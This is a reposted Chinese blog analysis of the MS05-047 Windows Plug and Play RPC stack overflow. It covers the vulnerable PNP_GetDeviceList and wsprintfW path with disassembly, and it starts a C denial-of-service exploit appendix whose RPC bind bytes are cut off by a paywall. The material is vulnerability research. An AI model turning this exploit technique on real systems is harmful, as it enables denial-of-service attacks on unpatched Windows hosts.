[转载]MS05-047 PNP栈溢出简要分析

最新推荐文章于 2021-02-09 00:05:34 发布
VIP文章 最新推荐文章于 2021-02-09 00:05:34 发布
阅读量5k 收藏
点赞数
分类专栏: 经典转载 文章标签: c binding null dos interface path
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/liond8/article/details/525805
版权

文章作者:ppwd
信息来源:http://bbs.nsfocus.net/index.php?act=ST&f=3&t=168032

该漏洞是微软10月11号公布10个漏洞中的一个,后来eeye公布了该漏洞的比较详细的细节。经过简单的分析,发现该漏洞的利用方式和MS05-039差不多,调用的是同一个RPC接口,只是功能函数不一样,MS05-039调用的是54号调用,而该漏洞则需要调用10或者11号调用。经过分析得到10和11号调用的函数接口如下:
10号调用的函数接口:
DWORD   PNP_GetDeviceList (
    [in] LPCTWSTR   pwszDeviceTypeName,     //设备类型名
    [out] LPWSTR       pwszDeviceList,     //相同类型的所有设备名列表
  [in,out]   DWORD       &lpBufferSize,     //缓冲区大小
    [in]   DWORD     dwFlag           //标志
)
该函数用来枚据系统中某种类型的所有设备名。系统中所有安装的设备都在注册表“HKEY_LOCAL_MACHINE/SYSTEM/CurrentControlSet/Enum”下,PNP_GetDeviceList函数就是从该目录下枚举相同类型的所有设备名。如果dwFlag标志为0,则枚据所有的设备名。如果标志为1,则枚举pwszDeviceTypeName指定类型的所有设备名。设备名按顺序依次存放在pwszDeviceList所指向的缓冲区中,最后以一个空字符串结束。设备名的格式为:DeviceTypeName/DeviceName,由于PNP_GetDeviceList函数需要调用wsprintfW函数来构造这种格式的设备名,wsprintfW函数使用的目标缓冲区是在栈中分配的固定大小的缓冲区,而DeviceTypeName是我们自己输入的,如果输入的DeviceTypeName的长度大于目标缓冲区的长度时,将造成栈溢出。
函数调用关系如下:
PNP_GetDeviceList
|___ GetInstanceList
  |____ wsprintfW

.text:76741BFA           lea   eax, [ebp+Name]
.text:76741C00           push   eax
.text:76741C01           push   [ebp+lpSubKey]
.text:76741C04           push   offset aSS     ; LPCWSTR %s/%s
.text:76741C09           lea   eax, [ebp+String]
.text:76741C0F           push   eax         ; LPWSTR
.text:76741C10           call   ds:__imp__wsprintfW

11号函数的调用接口如下:
DWORD PNP_GetDeviceListSize (
    [in] LPCTWSTR   pwszDeviceTypeName,     //设备类型名
    [out] DWORD     &lpDeviceListSize,         //设备名列表的长度
    [in] DWORD     dwFlag             //标志
)
该函数的主要功能就是得到枚举某种设备类型的所有设备名所需要的缓冲区的大小,并将该大小保存在变量lpDeviceListSize中。
虽然知道这两个函数的接口类型,但是要利用这个漏洞执行任意代码还有一定的难度,我现在也没有找到什么好用的方法,只写出了一个DOS的代码。
触发该漏洞的难点在于:所提供的设备类型名必须是注册表中已经存在的类型名,如果不存在,将不会调用函数wsprinfW,也就无法触发该漏洞。虽然可以通过在设备类型名的后面添加多个“/”字符,但是这样只能造成DOS攻击,所以无法将shellcode放置在设备类型名中。并且“HKEY_LOCAL_MACHINE/SYSTEM/CurrentControlSet/Enum”下的项是不让随便更改的,所以要完全利用还比较困难。附录中是我编写的一个DOS代码,对所有未打补丁的Win2000有效,其他版本的操作系统没有测试。
在此,特别感谢funnywei博士给我提供的大量的有关RPC的资料,以及在我调试过程中给于我的细心指导和不断鼓励,他永远是我学习的榜样,呵呵。

附录:MS05-047 PNP DOS代码

// PNPExploit2.cpp : Defines the entry point for the console application.
//

#include <stdio.h>
#include <windows.h>

#pragma comment(lib, "mpr")
#pragma comment(lib, "Rpcrt4")


unsigned char szBindString[] =
{
    0x05,0x00,0x0b,0x03,0x10,0x00,0x00,0x00,0x48,0x00,0x00,0x00,0x01,0x00,0x00,0x00,
    0xb8,0x10,0xb8,0x10,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x00,0x00,0x01,0x00,
    0x40,0x4e,0x9f,0x8d,0x3d,0xa0,0xce,0x11,0x8f,0x69,0x08,0x00,0x3e,0x30,0x05,0x1b,
    0x01,0x00,0x00,0x00,0x04,0x5d,0x88,0x8a,0xeb,
最低0.47元/天 解锁文章
觉鸿
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
液位传感器XKC-Y25-PNP.pdf
08-18
液位传感器XKC-Y25-PNP
ms05-017漏洞原理与复现
weixin_34250434的博客
09-13 1178
漏洞描述 此漏洞由lds-pl.net漏洞研究组在2003年7月16日发现,漏洞及exp在网上公开后,网上出现了大量的×××实例,利用此漏洞的蠕虫也大量出现。 漏洞编号 CVE-2005-0059 OSVDB-15458 MSB-MS05-017 BID-13112 ×××目标 DCOM接口的服务器端 影响系统 Microsoft Windows XP Service Pack 1 ...
裸机编程与调试 - 在项目中遇到的各类问题,解决经验分享(常见新手问题)
STCNXPARM的博客
04-12 3571
纲要: 一、软件调试四个目标 二、裸机软件调试 三、裸机编程 五、单片机软件调试中常见的案例(杂记) 一、软件调试四个目标 *项目的开发时间基本用在调试与及BUG的修复(维护) 1、确保程序表达书写正确(多练); 2、程序流程是否正确(中断正常跳入、触发一些条件时是否能进入相应的流程); 3、变量的值是否正确(必要时可以观看寄存器的值); 4、引脚的电平变化是否正确(示波...
渗透测试——网络服务渗透攻击
YT的博客
02-14 1万+
网络服务渗透攻击指的是:在之前的博客中描述的内存攻击中,以远程主机运行的某个网络服务程序为目标,向该目标服务开放端口发送内嵌恶意内容并符合该网络服务协议的数据包,利用网络服务程序内部的安全漏洞,劫持目标程序控制流,实施远程执行代码等行为,最终达到控制目标系统的目的。 以 Windows 系统平台为例,根据网络服务攻击面的类别来区分,可将网络服务渗透攻击分为以下三类: 针对 Windows 系统自...
渗透测试实例,xampp靶机实验
Mystic_JJ的博客
02-09 1264
实验名称:渗透测试实例,xampp靶机实验 实验目的:对xampp靶机进行渗透测试 实验环境:Kali虚拟机一台4G xampp靶机一台 IP:192.168.22.128 实验步骤: 一、对靶机进行扫描:使用Neuss 二、开启metasploit框架进行扫描 msf6 > db_nmap -A -T4 192.168.22.128 使用namp进行扫描 (1)进行渗透测试 扫描smb版本信息 msf6 > search smb_version 查看是否有smb版本扫
打印机驱动 HP_ljM1005-HB-pnp-sc
05-25
打印机驱动 HP_ljM1005-HB-pnp-sc打印机驱动 HP_ljM1005-HB-pnp-sc打印机驱动 HP_ljM1005-HB-pnp-sc打印机驱动 HP_ljM1005-HB-pnp-sc打印机驱动 HP_ljM1005-HB-pnp-sc打印机驱动 HP_ljM1005-HB-pnp-sc打印机驱动 HP_...
惠普 HP1000_P1500-HB-pnp-win64-sc打印机驱动
04-26
惠普 HP1000_P1500-HB-pnp-win64-sc打印机驱动
PNP三极管分析方法
07-12
PNP三极管的分析方法 PNP型三极管,是由2块P型半导体中间夹着1块N型半导体所组成的三极管,所以称为PNP型三极管。也可以描述成,电流从发射极E流入的三极管。 晶体三极管按材料分有两种:锗管和硅管。而每一种又有...
grafana-pnp-datasource:Grafana 的 PNP4NagiosRRD 数据源
05-30
PNP Grafana 数据源 - 使用 PNP4Nagios 访问 RRD 文件的 Grafana 后端数据源安装在 Grafana 插件目录中搜索pnp或直接使用 grafana-cli 命令: %> grafana-cli plugins install sni-pnp-datasource包含这个数据源,...
Kali Linux 网络扫描秘籍 第六章 拒绝服务(二)
热门推荐
龙哥盟
11-24 4万+
第六章 拒绝服务(二) 作者:Justin Hutchens 译者:飞龙 协议:CC BY-NC-SA 4.0 6.6 NTP 放大 DoS 攻击NTP 放大 DoS 攻击利用响应远程 monlist 请求的网络时间协议(NTP)服务器。 monlist 函数返回与服务器交互的所有设备的列表,在某些情况下最多达 600 个列表。 攻击者可以伪造来自目标 IP 地址的请求,并且
B05 - 047、MapTask工作机制
吾心持剑,剑锋披靡
06-18 101
0、Mapreduce的combiner 初学耗时:0.5h 注:CSDN手机端暂不支持章节内链跳转,但外链可用,更好体验还请上电脑端。 一、Mapreduce的combiner 记忆词:   combiner  ギ 舒适区ゾ || ♂ 累觉无爱 ♀ 一、Mapreduce的combiner 每一个 map 都可能会产生大量的本地输出,Combiner 的作用就是对 ...
Phrack最新公布的内核态RootKit的技术细节[转]
LionD8' Blog 个人作品 www.360kdj.com 360KDJ股票实验室
04-02 7671
==Phrack Inc.== Volume 0x0b, Issue 0x3e, Phile #0x06 of 0x10 |=---------------=[ Kernel-mode backdoors for Windows NT ]=--------------=| |=-------------------------------------------------------------
TDI Hooking [Zz]
LionD8' Blog 个人作品 www.360kdj.com 360KDJ股票实验室
09-13 6207
NDIS and TDI Hooking, Part II By: andreas This is the second and last article on how to hook into the NDIS and TDI layer. The approach we will use will be slightly different from the NDIS case. Howeve
TDI [Zz]
LionD8' Blog 个人作品 www.360kdj.com 360KDJ股票实验室
09-16 5697
#define MY_PORT   7609   HANDLE hTdiTransport = NULL;                    // handle to tdi transport   PFILE_OBJECT pTdiTransportObject = NULL;        // pointer to tdi transport object   dStatus = Tdi
利用调用门从Ring 3进入Ring 0[转]
LionD8' Blog 个人作品 www.360kdj.com 360KDJ股票实验室
06-30 5312
☆ 利用调用门从Ring 3进入Ring 0观察用户空间程序memdump.exe执行时CS、DS、FS所对应的段描述符:--------------------------------------------------------------------------> memdump -l 8GDTR.base             = 0x8003F000GDTR.limit       
Hook Dispatch 实时监控[zz]
LionD8' Blog 个人作品 www.360kdj.com 360KDJ股票实验室
09-08 5094
作者:pker/*++Module Name:    FSHook.cAbstract:    I  wanted  to  build a filter driver when I first  thought about doing such    kind of things.  But then I found that its not realistic cause it have
关于字节对齐【转载
LionD8' Blog 个人作品 www.360kdj.com 360KDJ股票实验室
08-10 4588
#pragma pack(8)struct s1{short a;long b;};struct s2{char c;s1 d;long long e;};#pragma pack()问 1.sizeof(s2) = ?2.s2的c后面空了几个字节接着是d?sizeof(S2)结果为24.成员对齐有一个重要的条件,即每个成员分别对齐.即每个成员按自己的方式对齐.也就是说上面虽然指定了按8字节对齐,
pnp三极管放大电路分析
最新发布
01-29
PNP三极管放大电路是一种常见的电子放大器电路,它通过控制输入信号电压来放大输出信号电压。这种电路通常由PNP三极管、负载电阻和输入电阻组成。当输入信号施加在基极上时,PNP三极管的电流被调整,从而控制负载电阻上的电压,实现信号放大的功能。 对于PNP三极管放大电路的分析,首先需要对电路进行建模和参数提取,得到电路的等效电路模型。然后可以使用基本的电路分析方法,比如基尔霍夫定律和欧姆定律,来分析电路的工作原理和性能。 对于PNP三极管放大电路的放大性能,可以通过计算直流增益和交流增益来评估。直流增益通常通过测量输入直流信号和输出直流信号的比值来计算,而交流增益则是通过测量输入交流信号和输出交流信号的比值来计算。另外,还可以分析频率响应和带宽等性能指标。 在实际应用中,还需要考虑PNP三极管的工作状态和稳定性,以及电路的偏置和温度影响等因素。通过深入分析和优化设计,可以实现更好的放大效果和稳定性。同时,还可以根据具体的应用需求,选择合适的PNP三极管型号和外围电路元件,以满足不同的应用场景和性能要求。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值